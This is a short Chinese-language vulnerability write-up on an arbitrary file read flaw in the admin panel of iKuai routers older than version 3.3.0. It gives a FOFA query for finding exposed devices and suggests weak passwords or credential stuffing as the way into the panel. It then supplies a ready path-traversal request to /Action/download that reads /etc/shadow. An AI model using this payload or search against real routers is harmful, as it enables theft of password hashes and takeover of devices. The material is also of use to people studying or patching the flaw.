## 爱快路由器后台任意文件读取
## 漏洞描述
爱块路由器后台存在任意文件读取漏洞,攻击者可通过漏洞读取敏感信息
## 漏洞影响
> 3.3.0 x64 Build201912171705 以下版本
## FOFA
> app="iKuai-产品"
## 漏洞复现
该漏洞需要先通过某种手段进入到后台,如弱口令、撞库等。
进入到后台之后可通过以下url进行任意文件读取
```
http://x.x.x.x/Action/download?filename=../../../../../../etc/shadow HTTP/1.1
```